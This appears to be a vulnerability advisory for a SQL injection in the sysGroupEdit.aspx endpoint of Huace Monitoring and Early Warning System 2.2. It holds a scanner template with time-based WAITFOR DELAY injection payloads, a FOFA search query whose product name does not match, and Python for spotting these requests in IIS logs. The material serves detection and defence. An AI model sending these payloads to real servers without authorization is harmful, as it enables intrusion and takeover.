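Vulnerability Description
The sysGroupEdit.aspx endpoint of Huace Monitoring and Early Warning System (华测监测预警系统) 2.2 is vulnerable to SQL injection. An unauthenticated attacker can use it to execute arbitrary SQL statements, call xp_cmdshell to write a backdoor file, and execute arbitrary code, thereby gaining control of the server.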
FOFA: app="金和网络-金和OA"
id: huace-sysgoupedit-sqli

info:
  name: 华测监测预警系统2.2 sysGroupEdit.aspx SQL注入漏洞
  author: AVIC123
  severity: high
  verified: true
  description: |-
    华测监测预警系统2.2 sysGroupEdit.aspx接口存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xpcmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
    FOFA: app="金和网络-金和OA"
  reference:
    - https://cn-sec.com/archives/4330220.html
  tags: huace,sqli
  created: 2025/08/06

rules:
  r0:
    request:
      method: GET
      path: /Web/SysManage/sysGroupEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:5'--
    expression: response.status == 200 && response.latency <= 7000 && response.latency >= 5000
  r1:
    request:
      method: GET
      path: /Web/SysManage/sysGroupEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:10'--
    expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
expression: r0() && r1()
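
A defender-side check for the two requests in the rules above, as an added example that is not part of the original page or the template author's code: it scans IIS W3C logs for non-numeric ID values on sysGroupEdit.aspx and compares time-taken with the requested WAITFOR DELAY. The log lines are constructed, and the field layout and the rule that a purely numeric ID is normal traffic are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log sample (not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status time-taken
2025-08-06 10:00:01 GET /Web/SysManage/sysGroupEdit.aspx ID=12 200 43
2025-08-06 10:00:07 GET /Web/SysManage/sysGroupEdit.aspx &ID=1';WAITFOR+DELAY+'0:0:5'-- 200 5031
2025-08-06 10:00:19 GET /Web/SysManage/sysGroupEdit.aspx &ID=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A10%27-- 200 10048
2025-08-06 10:00:25 GET /Web/Login.aspx - 200 12
2025-08-06 10:00:30 GET /web/sysmanage/SYSGROUPEDIT.ASPX id=7 200 39
"""

TARGET = "/web/sysmanage/sysgroupedit.aspx"  # IIS paths are case-insensitive
DELAY_RE = re.compile(r"waitfor\s+delay\s+'(\d+):(\d+):(\d+)'", re.I)

def parse_w3c(text):
    # Yield one dict per log entry, keyed by the names in the #Fields header.
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def id_value(query):
    # Return the URL-decoded ID parameter, or None if it is absent.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() == "id":
            return unquote_plus(value)
    return None

def find_injection_attempts(text):
    """Return (time, decoded ID, requested delay ms, delay observed) per suspicious hit."""
    hits = []
    for e in parse_w3c(text):
        if e["cs-uri-stem"].lower() != TARGET:
            continue
        value = id_value(e["cs-uri-query"])
        if value is None or value.isdigit():
            continue  # assumption: a purely numeric ID is normal traffic
        m = DELAY_RE.search(value)
        delay_ms = None
        if m:
            h, mi, s = map(int, m.groups())
            delay_ms = (h * 3600 + mi * 60 + s) * 1000
        # time-taken at or above the requested delay suggests the statement ran
        observed = delay_ms is not None and int(e["time-taken"]) >= delay_ms
        hits.append((e["time"], value, delay_ms, observed))
    return hits
```

A hit whose last element is True means the server waited at least as long as the injected delay, so the host should be treated as affected and reviewed for follow-on activity.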